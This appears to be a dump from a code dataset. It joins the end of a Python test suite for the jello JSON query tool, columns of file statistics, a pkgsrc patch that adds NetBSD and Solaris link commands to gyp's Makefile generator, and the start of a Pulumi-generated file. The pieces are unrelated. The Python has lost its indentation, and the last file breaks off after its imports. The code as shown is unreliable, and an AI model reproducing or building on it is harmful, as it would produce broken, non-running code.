{"name":"hosts","argument":"--hosts","version":"1.0","description":"/etc/hosts file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
{"name":"id","argument":"--id","version":"1.0","description":"id command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["id"]}
{"name":"ifconfig","argument":"--ifconfig","version":"1.5","description":"ifconfig command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using ifconfig-parser package from https://github.com/KnightWhoSayNi/ifconfig-parser","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["ifconfig"]}
{"name":"ini","argument":"--ini","version":"1.0","description":"INI file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using configparser from the standard library","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
{"name":"iptables","argument":"--iptables","version":"1.1","description":"iptables command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["iptables"]}
{"name":"jobs","argument":"--jobs","version":"1.0","description":"jobs command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["jobs"]}
{"name":"last","argument":"--last","version":"1.0","description":"last and lastb command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["last","lastb"]}
{"name":"ls","argument":"--ls","version":"1.3","description":"ls command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["ls"]}
{"name":"lsblk","argument":"--lsblk","version":"1.3","description":"lsblk command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsblk"]}
{"name":"lsmod","argument":"--lsmod","version":"1.1","description":"lsmod command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsmod"]}
{"name":"lsof","argument":"--lsof","version":"1.0","description":"lsof command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsof"]}
{"name":"mount","argument":"--mount","version":"1.1","description":"mount command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["mount"]}
{"name":"netstat","argument":"--netstat","version":"1.2","description":"netstat command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["netstat"]}
{"name":"ntpq","argument":"--ntpq","version":"1.0","description":"ntpq -p command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["ntpq"]}
{"name":"passwd","argument":"--passwd","version":"1.0","description":"/etc/passwd file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]}
{"name":"pip_list","argument":"--pip-list","version":"1.0","description":"pip list command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["pip list","pip3 list"]}
{"name":"pip_show","argument":"--pip-show","version":"1.0","description":"pip show command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["pip show","pip3 show"]}
{"name":"ps","argument":"--ps","version":"1.1","description":"ps command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["ps"]}
{"name":"route","argument":"--route","version":"1.0","description":"route command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["route"]}
{"name":"shadow","argument":"--shadow","version":"1.0","description":"/etc/shadow file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]}
{"name":"ss","argument":"--ss","version":"1.0","description":"ss command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["ss"]}
{"name":"stat","argument":"--stat","version":"1.0","description":"stat command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["stat"]}
{"name":"systemctl","argument":"--systemctl","version":"1.0","description":"systemctl command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl"]}
{"name":"systemctl_lj","argument":"--systemctl-lj","version":"1.0","description":"systemctl list-jobs command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-jobs"]}
{"name":"systemctl_ls","argument":"--systemctl-ls","version":"1.0","description":"systemctl list-sockets command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-sockets"]}
{"name":"systemctl_luf","argument":"--systemctl-luf","version":"1.0","description":"systemctl list-unit-files command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-unit-files"]}
{"name":"timedatectl","argument":"--timedatectl","version":"1.0","description":"timedatectl status command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["timedatectl","timedatectl status"]}
{"name":"uname","argument":"--uname","version":"1.1","description":"uname -a command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["uname"]}
{"name":"uptime","argument":"--uptime","version":"1.0","description":"uptime command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["uptime"]}
{"name":"w","argument":"--w","version":"1.0","description":"w command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["w"]}
{"name":"who","argument":"--who","version":"1.0","description":"who command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["who"]}
{"name":"xml","argument":"--xml","version":"1.0","description":"XML file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the xmltodict library at https://github.com/martinblech/xmltodict","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
{"name":"yaml","argument":"--yaml","version":"1.0","description":"YAML file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the ruamel.yaml library at https://pypi.org/project/ruamel.yaml","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-l', '_.parsers']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_parsers_18(self):
"""
Test jc -a | jello '_["parsers"][18]'
"""
self.expected = '''\
{
"name": "id",
"argument": "--id",
"version": "1.0",
"description": "id command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
],
"magic_commands": [
"id"
]
}
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '_["parsers"][18]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_parsers_18_dot(self):
"""
Test jc -a | jello _.parsers[18]
"""
self.expected = '''\
{
"name": "id",
"argument": "--id",
"version": "1.0",
"description": "id command parser",
"author": "Kelly Brazil",
"author_email": "kellyjonbrazil@gmail.com",
"compatible": [
"linux",
"darwin",
"aix",
"freebsd"
],
"magic_commands": [
"id"
]
}
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '_.parsers[18]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_s_parsers_18_dot(self):
"""
Test jc -a | jello -s _.parsers[18]
"""
self.expected = '''\
.name = "id";
.argument = "--id";
.version = "1.0";
.description = "id command parser";
.author = "Kelly Brazil";
.author_email = "kellyjonbrazil@gmail.com";
.compatible[0] = "linux";
.compatible[1] = "darwin";
.compatible[2] = "aix";
.compatible[3] = "freebsd";
.magic_commands[0] = "id";
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-s', '_.parsers[18]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_parsers_18_name(self):
"""
Test jc -a | jello '_["parsers"][18]["name"]'
"""
self.expected = '"id"\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '_["parsers"][18]["name"]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_parsers_18_name_dot(self):
"""
Test jc -a | jello _.parsers[18].name
"""
self.expected = '"id"\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '_.parsers[18].name']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_l_parsers_18_name(self):
"""
Test jc -a | jello -l '_["parsers"][18]["name"]'
"""
self.expected = '"id"\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-l', '_["parsers"][18]["name"]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_l_parsers_18_name_dot(self):
"""
Test jc -a | jello -l _.parsers[18].name
"""
self.expected = '"id"\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-l', '_.parsers[18].name']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_r_parsers_18_name(self):
"""
Test jc -a | jello -r '_["parsers"][18]["name"]'
"""
self.expected = 'id\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-r', '_["parsers"][18]["name"]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_r_parsers_18_name_dot(self):
"""
Test jc -a | jello -r _.parsers[18].name
"""
self.expected = 'id\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-r', '_.parsers[18].name']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_parsers_18_compatible(self):
"""
Test jc -a | jello '_["parsers"][18]["compatible"]'
"""
self.expected = '''\
[
"linux",
"darwin",
"aix",
"freebsd"
]
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '_["parsers"][18]["compatible"]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_parsers_18_compatible_dot(self):
"""
Test jc -a | jello _.parsers[18].compatible
"""
self.expected = '''\
[
"linux",
"darwin",
"aix",
"freebsd"
]
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '_.parsers[18].compatible']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_s_parsers_18_compatible_dot(self):
"""
Test jc -a | jello -s _.parsers[18].compatible
"""
self.expected = '''\
.[0] = "linux";
.[1] = "darwin";
.[2] = "aix";
.[3] = "freebsd";
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-s', '_.parsers[18].compatible']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_c_parsers_18_compatible(self):
"""
Test jc -a | jello -c '_["parsers"][18]["compatible"]'
"""
self.expected = '["linux","darwin","aix","freebsd"]\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-c', '_["parsers"][18]["compatible"]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_c_parsers_18_compatible_dot(self):
"""
Test jc -a | jello -c _.parsers[18].compatible
"""
self.expected = '["linux","darwin","aix","freebsd"]\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-c', '_.parsers[18].compatible']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_l_parsers_18_compatible(self):
"""
Test jc -a | jello -l '_["parsers"][18]["compatible"]'
"""
self.expected = '''\
"linux"
"darwin"
"aix"
"freebsd"
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-l', '_["parsers"][18]["compatible"]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_l_parsers_18_compatible_dot(self):
"""
Test jc -a | jello -l _.parsers[18].compatible
"""
self.expected = '''\
"linux"
"darwin"
"aix"
"freebsd"
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-l', '_.parsers[18].compatible']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_lr_parsers_18_compatible(self):
"""
Test jc -a | jello -lr '_["parsers"][18]["compatible"]'
"""
self.expected = '''\
linux
darwin
aix
freebsd
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-lr', '_["parsers"][18]["compatible"]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_lr_parsers_18_compatible_dot(self):
"""
Test jc -a | jello -lr _.parsers[18].compatible
"""
self.expected = '''\
linux
darwin
aix
freebsd
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-lr', '_.parsers[18].compatible']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_c_list_comprehension(self):
"""
Test jc -a | jello -c '[entry["name"] for entry in _["parsers"] if "darwin" in entry["compatible"]]'
"""
self.expected = '["airport","airport_s","arp","crontab","crontab_u","csv","df","dig","du","env","file","group","history","hosts","id","ifconfig","ini","jobs","last","ls","mount","passwd","pip_list","pip_show","ps","shadow","uname","uptime","w","who","xml","yaml"]\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-c', '[entry["name"] for entry in _["parsers"] if "darwin" in entry["compatible"]]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_c_list_comprehension_dot(self):
"""
Test jc -a | jello -c '[entry.name for entry in _.parsers if "darwin" in entry.compatible]'
"""
self.expected = '["airport","airport_s","arp","crontab","crontab_u","csv","df","dig","du","env","file","group","history","hosts","id","ifconfig","ini","jobs","last","ls","mount","passwd","pip_list","pip_show","ps","shadow","uname","uptime","w","who","xml","yaml"]\n'
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-c', '[entry.name for entry in _.parsers if "darwin" in entry.compatible]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_twitter_jlines_to_json(self):
"""
Test cat twitterdata.jlines | jello
"""
self.expected = self.twitterdata_output
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.twitterdata)
self.assertEqual(f.getvalue(), self.expected)
def test_twitter_lines_table(self):
"""
Test cat twitterdata.jlines | jello -l '\
user_ids = set()
result = []
for tweet in _:
user_ids.add(tweet["user"]["id"])
for user in user_ids:
user_profile = {}
tweet_ids = []
for tweet in _:
if tweet["user"]["id"] == user:
user_profile.update({
"user_id": user,
"user_name": tweet["user"]["screen_name"],
"user_followers": tweet["user"]["followers_count"]})
tweet_ids.append(str(tweet["id"]))
user_profile["tweet_ids"] = ";".join(tweet_ids)
result.append(user_profile)
result'
"""
self.query = '''\
user_ids = set()
result = []
for tweet in _:
user_ids.add(tweet["user"]["id"])
for user in user_ids:
user_profile = {}
tweet_ids = []
for tweet in _:
if tweet["user"]["id"] == user:
user_profile.update({
"user_id": user,
"user_name": tweet["user"]["screen_name"],
"user_followers": tweet["user"]["followers_count"]})
tweet_ids.append(str(tweet["id"]))
user_profile["tweet_ids"] = ";".join(tweet_ids)
result.append(user_profile)
result
'''
self.expected = self.twitter_table_output
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-l', self.query]
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.twitterdata)
self.assertEqual(f.getvalue(), self.expected)
def test_twitter_lines_table_schema(self):
"""
Test cat twitterdata.jlines | jello -s '\
user_ids = set()
result = []
for tweet in _:
user_ids.add(tweet["user"]["id"])
for user in user_ids:
user_profile = {}
tweet_ids = []
for tweet in _:
if tweet["user"]["id"] == user:
user_profile.update({
"user_id": user,
"user_name": tweet["user"]["screen_name"],
"user_followers": tweet["user"]["followers_count"]})
tweet_ids.append(str(tweet["id"]))
user_profile["tweet_ids"] = ";".join(tweet_ids)
result.append(user_profile)
result'
"""
self.query = '''\
user_ids = set()
result = []
for tweet in _:
user_ids.add(tweet["user"]["id"])
for user in user_ids:
user_profile = {}
tweet_ids = []
for tweet in _:
if tweet["user"]["id"] == user:
user_profile.update({
"user_id": user,
"user_name": tweet["user"]["screen_name"],
"user_followers": tweet["user"]["followers_count"]})
tweet_ids.append(str(tweet["id"]))
user_profile["tweet_ids"] = ";".join(tweet_ids)
result.append(user_profile)
result
'''
self.expected = self.twitter_table_output_schema
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-s', self.query]
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.twitterdata)
self.assertEqual(f.getvalue(), self.expected)
def test_twitter_lines_table_dot(self):
"""
Test cat twitterdata.jlines | jello -l '\
user_ids = set()
result = []
for tweet in _:
user_ids.add(tweet.user.id)
for user in user_ids:
user_profile = {}
tweet_ids = []
for tweet in _:
if tweet.user.id == user:
user_profile.update({
"user_id": user,
"user_name": tweet.user.screen_name,
"user_followers": tweet.user.followers_count})
tweet_ids.append(str(tweet.id))
user_profile.tweet_ids = ";".join(tweet_ids)
result.append(user_profile)
result'
"""
self.query = '''\
user_ids = set()
result = []
for tweet in _:
user_ids.add(tweet.user.id)
for user in user_ids:
user_profile = {}
tweet_ids = []
for tweet in _:
if tweet.user.id == user:
user_profile.update({
"user_id": user,
"user_name": tweet.user.screen_name,
"user_followers": tweet.user.followers_count})
tweet_ids.append(str(tweet.id))
user_profile["tweet_ids"] = ";".join(tweet_ids)
result.append(user_profile)
result
'''
self.expected = self.twitter_table_output
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-l', self.query]
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.twitterdata)
self.assertEqual(f.getvalue(), self.expected)
if __name__ == '__main__':
unittest.main()
| 45.819457
| 12,740
| 0.60716
| 17,181
| 153,541
| 5.346429
| 0.015133
| 0.039714
| 0.084392
| 0.148927
| 0.835734
| 0.80007
| 0.744745
| 0.739595
| 0.732563
| 0.731615
| 0
| 0.026574
| 0.158121
| 153,541
| 3,350
| 12,741
| 45.833134
| 0.684047
| 0.029972
| 0
| 0.537237
| 0
| 0.036919
| 0.914397
| 0.400342
| 0
| 0
| 0
| 0
| 0.010185
| 1
| 0.010503
| false
| 0.006047
| 0.002546
| 0
| 0.013367
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
336f1b7a21506cfec58038472545773c94776183
| 6,053
|
py
|
Python
|
source/pkgsrc/devel/gyp/patches/patch-pylib_gyp_generator_make.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1
|
2021-11-20T22:46:39.000Z
|
2021-11-20T22:46:39.000Z
|
source/pkgsrc/devel/gyp/patches/patch-pylib_gyp_generator_make.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
source/pkgsrc/devel/gyp/patches/patch-pylib_gyp_generator_make.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
$NetBSD: patch-pylib_gyp_generator_make.py,v 1.4 2014/08/25 13:20:12 fhajny Exp $
Force platform libtool na Darwin, see
https://code.google.com/p/gyp/issues/detail?id=354&q=libtool
Also, don't try to use thin archives on NetBSD, they appear not to work
("ar t <archive>" says "Malformed archive").
--- pylib/gyp/generator/make.py.orig 2014-07-14 14:19:49.000000000 +0000
+++ pylib/gyp/generator/make.py
@@ -167,9 +167,83 @@ quiet_cmd_solink_module = SOLINK_MODULE(
cmd_solink_module = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--start-group $(filter-out FORCE_DO_CMD, $^) -Wl,--end-group $(LIBS)
"""
+LINK_COMMANDS_NETBSD = """\
+quiet_cmd_alink = AR($(TOOLSET)) $@
+cmd_alink = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
+
+quiet_cmd_alink_thin = AR($(TOOLSET)) $@
+# Thin archives do not appear to work with the NetBSD-supplied version of GNU ar, so work around that
+cmd_alink_thin = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
+
+# Due to circular dependencies between libraries :(, we wrap the
+# special "figure out circular dependencies" flags around the entire
+# input list during linking.
+quiet_cmd_link = LINK($(TOOLSET)) $@
+cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ -Wl,--start-group $(LD_INPUTS) -Wl,--end-group $(LIBS)
+
+# We support two kinds of shared objects (.so):
+# 1) shared_library, which is just bundling together many dependent libraries
+# into a link line.
+# 2) loadable_module, which is generating a module intended for dlopen().
+#
+# They differ only slightly:
+# In the former case, we want to package all dependent code into the .so.
+# In the latter case, we want to package just the API exposed by the
+# outermost module.
+# This means shared_library uses --whole-archive, while loadable_module doesn't.
+# (Note that --whole-archive is incompatible with the --start-group used in
+# normal linking.)
+
+# Other shared-object link notes:
+# - Set SONAME to the library filename so our binaries don't reference
+# the local, absolute paths used on the link command-line.
+quiet_cmd_solink = SOLINK($(TOOLSET)) $@
+cmd_solink = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--whole-archive $(LD_INPUTS) -Wl,--no-whole-archive $(LIBS)
+
+quiet_cmd_solink_module = SOLINK_MODULE($(TOOLSET)) $@
+cmd_solink_module = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--start-group $(filter-out FORCE_DO_CMD, $^) -Wl,--end-group $(LIBS)
+"""
+
+LINK_COMMANDS_SOLARIS = """\
+quiet_cmd_alink = AR($(TOOLSET)) $@
+cmd_alink = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
+
+quiet_cmd_alink_thin = AR($(TOOLSET)) $@
+# Thin archives do not appear to work with the NetBSD-supplied version of GNU ar, so work around that
+cmd_alink_thin = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
+
+# Due to circular dependencies between libraries :(, we wrap the
+# special "figure out circular dependencies" flags around the entire
+# input list during linking.
+quiet_cmd_link = LINK($(TOOLSET)) $@
+cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ -Wl,--start-group $(LD_INPUTS) -Wl,--end-group $(LIBS)
+
+# We support two kinds of shared objects (.so):
+# 1) shared_library, which is just bundling together many dependent libraries
+# into a link line.
+# 2) loadable_module, which is generating a module intended for dlopen().
+#
+# They differ only slightly:
+# In the former case, we want to package all dependent code into the .so.
+# In the latter case, we want to package just the API exposed by the
+# outermost module.
+# This means shared_library uses --whole-archive, while loadable_module doesn't.
+# (Note that --whole-archive is incompatible with the --start-group used in
+# normal linking.)
+
+# Other shared-object link notes:
+# - Set SONAME to the library filename so our binaries don't reference
+# the local, absolute paths used on the link command-line.
+quiet_cmd_solink = SOLINK($(TOOLSET)) $@
+cmd_solink = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--whole-archive $(LD_INPUTS) -Wl,--no-whole-archive $(LIBS)
+
+quiet_cmd_solink_module = SOLINK_MODULE($(TOOLSET)) $@
+cmd_solink_module = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--start-group $(filter-out FORCE_DO_CMD, $^) -Wl,--end-group $(LIBS)
+"""
+
LINK_COMMANDS_MAC = """\
quiet_cmd_alink = LIBTOOL-STATIC $@
-cmd_alink = rm -f $@ && ./gyp-mac-tool filter-libtool libtool $(GYP_LIBTOOLFLAGS) -static -o $@ $(filter %.o,$^)
+cmd_alink = rm -f $@ && ./gyp-mac-tool filter-libtool /usr/bin/libtool $(GYP_LIBTOOLFLAGS) -static -o $@ $(filter %.o,$^)
quiet_cmd_link = LINK($(TOOLSET)) $@
cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o "$@" $(LD_INPUTS) $(LIBS)
@@ -350,7 +424,7 @@ sed -e "s|^$(notdir $@)|$@|" $(depfile).
# We remove slashes and replace spaces with new lines;
# remove blank lines;
# delete the first line and append a colon to the remaining lines.
-sed -e 's|\\||' -e 'y| |\n|' $(depfile).raw |\
+env NL=`printf "\n"` sed -e 's|\\||' -e 's| |${NL}|g' $(depfile).raw |\
grep -v '^$$' |\
sed -e 1d -e 's|$$|:|' \
>> $(depfile)
@@ -2044,6 +2118,7 @@ def GenerateOutput(target_list, target_d
header_params.update({
'flock': './gyp-flock-tool flock',
'flock_index': 2,
+ 'link_commands': LINK_COMMANDS_SOLARIS,
})
elif flavor == 'freebsd':
# Note: OpenBSD has sysutils/flock. lockf seems to be FreeBSD specific.
@@ -2056,6 +2131,11 @@ def GenerateOutput(target_list, target_d
'flock': './gyp-flock-tool flock',
'flock_index': 2,
})
+ elif flavor == 'netbsd':
+ header_params.update({
+ 'link_commands': LINK_COMMANDS_NETBSD,
+ })
+
header_params.update({
'CC.target': GetEnvironFallback(('CC_target', 'CC'), '$(CC)'),
| 48.424
| 181
| 0.660995
| 870
| 6,053
| 4.475862
| 0.266667
| 0.026708
| 0.034926
| 0.049307
| 0.80226
| 0.78454
| 0.75886
| 0.74037
| 0.723421
| 0.705958
| 0
| 0.017812
| 0.155956
| 6,053
| 124
| 182
| 48.814516
| 0.744373
| 0
| 0
| 0.265487
| 0
| 0.106195
| 0.075105
| 0.005777
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.00885
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3370e9a195f091b360cc6cd67353cf91267beeff
| 18,003
|
py
|
Python
|
sdk/python/pulumi_aws/codestarconnections/host.py
|
alexbowers/pulumi-aws
|
7dbdb03b1e4f7c0d51d5b5d17233ff4465c3eff5
|
[
"ECL-2.0",
"Apache-2.0"
] | 260
|
2018-06-18T14:57:00.000Z
|
2022-03-29T11:41:03.000Z
|
sdk/python/pulumi_aws/codestarconnections/host.py
|
alexbowers/pulumi-aws
|
7dbdb03b1e4f7c0d51d5b5d17233ff4465c3eff5
|
[
"ECL-2.0",
"Apache-2.0"
] | 1,154
|
2018-06-19T20:38:20.000Z
|
2022-03-31T19:48:16.000Z
|
sdk/python/pulumi_aws/codestarconnections/host.py
|
alexbowers/pulumi-aws
|
7dbdb03b1e4f7c0d51d5b5d17233ff4465c3eff5
|
[
"ECL-2.0",
"Apache-2.0"
] | 115
|
2018-06-28T03:20:27.000Z
|
2022-03-29T11:41:06.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
